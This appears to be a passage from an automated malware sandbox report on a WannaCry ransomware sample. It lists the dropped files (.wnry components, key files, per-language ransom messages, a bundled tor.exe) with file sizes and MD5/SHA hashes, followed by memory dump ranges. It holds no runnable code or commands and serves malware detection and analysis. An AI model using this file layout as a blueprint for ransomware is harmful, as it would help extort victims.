SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\00000000.eky

Filesize
1KB

MD5
b0909a7db10cc49b5042bf78929ea1b6

SHA1
4c8fb000ec53a86bc6e951f2679437aa2c66ba98

SHA256
407d87cebecf6792ad4faaa29eb59544a5e981d7e05d8a8175ed4e5a95f9ccd5

SHA512
fa304e7db0a3cda61b6c0ab656cf22d8333eb45cf55acecde2ac0604600572f2c3949265f2a99877f34077c9b903569552f86f3d4d566bff337637b403a74c52

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\00000000.pky

Filesize
276B

MD5
90216a57f32d394c74e6528c062a8281

SHA1
fb03497de23d9b1692400b6528ccef84d85a038a

SHA256
6d89eda01de99cab006dd39a712c4e707d10525bc9203dd5f54b6721b1752075

SHA512
5b97dd6706d3f2b6d34be11f5b380bc8b882846c230b45f8e342297617375cdc0a82dee725fc01175349d3bf7ef74af85fa0a3b08d991aa75bf5c6b12f97210c

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\00000000.res

Filesize
136B

MD5
238dfeadffca2d282a858f51211e293f

SHA1
454c0e429ef0dfafaba0ae2596e4eb95ac6e6529

SHA256
f4f3162a3fecf2624f3352b6b3870c08c232c3783a0d6c6fd02ee9765f5702f2

SHA512
3ceb6258d15993ac7bc342729c61667709c6db6b56ebe5d13997b57bf4ae4d183096030644553bef6a479c477db365c63a30016595288a7254be4f3742b2bf36

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]

Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\c.wnry

Filesize
780B

MD5
383a85eab6ecda319bfddd82416fc6c2

SHA1
2a9324e1d02c3e41582bf5370043d8afeb02ba6f

SHA256
079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

SHA512
c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1920_1088551073\InputExtractor.js

Filesize
11KB

MD5
7c6845c9bce19d12f54b304dca4e5941

SHA1
7560ef6c8e4e46db38fcfdc729f0dae8c8bda940

SHA256
f0611864a0e8919821af3a88ed4ab863de0120a112ee99b05485a49d83f34b27

SHA512
9bf2977caef0778c9da343c897d12ce9fb03305efa167df9e7750e593e399d65b5339e06fe1037953e2ff20041ed4a7eb83647cfa966857ef7dcabb1c87815f4

Download Submit
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1920_1088551073\manifest.json

Filesize
116B

MD5
25f7c066eba213487d7271bf63180765

SHA1
441d0bcb8da11dc1e3d9621b3fb9f27258828d76

SHA256
4f714a821e6026f2cb9bbe9eda4e58d9710a4a0b110f1fa534f4f827302ff069

SHA512
d8b75daa4d21302180100517132cfb1bfab671bdd724fce2e92ba91277bbe4eae79bd679c6f41119464ab772bb4ae14e1a4dcb79719ae1daa4d066f1f63924ba

Download Submit
memory/5604-828-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/5964-2425-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/5964-2387-0x0000000073160000-0x000000007337C000-memory.dmp

Filesize
2.1MB

Download
memory/5964-2547-0x0000000073160000-0x000000007337C000-memory.dmp

Filesize
2.1MB

Download
memory/5964-2430-0x0000000073380000-0x00000000733F7000-memory.dmp

Filesize
476KB

Download
memory/5964-2461-0x0000000073160000-0x000000007337C000-memory.dmp

Filesize
2.1MB

Download
memory/5964-2667-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/5964-2585-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/5964-2431-0x0000000073160000-0x000000007337C000-memory.dmp

Filesize
2.1MB

Download
memory/5964-2541-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/5964-2427-0x00000000734C0000-0x0000000073542000-memory.dmp

Filesize
520KB

Download
memory/5964-2613-0x0000000073160000-0x000000007337C000-memory.dmp

Filesize
2.1MB

Download
memory/5964-2428-0x0000000073490000-0x00000000734B2000-memory.dmp

Filesize
136KB

Download
memory/5964-2429-0x0000000073400000-0x0000000073482000-memory.dmp

Filesize
520KB

Download
memory/5964-2539-0x0000000073160000-0x000000007337C000-memory.dmp

Filesize
2.1MB

Download
memory/5964-2533-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/5964-2455-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/5964-2388-0x0000000073400000-0x0000000073482000-memory.dmp

Filesize
520KB

Download
memory/5964-2426-0x0000000074020000-0x000000007403C000-memory.dmp

Filesize
112KB

Download
memory/5964-2389-0x0000000073490000-0x00000000734B2000-memory.dmp

Filesize
136KB

Download
memory/5964-2390-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download
memory/5964-2386-0x00000000734C0000-0x0000000073542000-memory.dmp

Filesize
520KB

Download
memory/5964-2607-0x0000000000FC0000-0x00000000012BE000-memory.dmp

Filesize
3.0MB

Download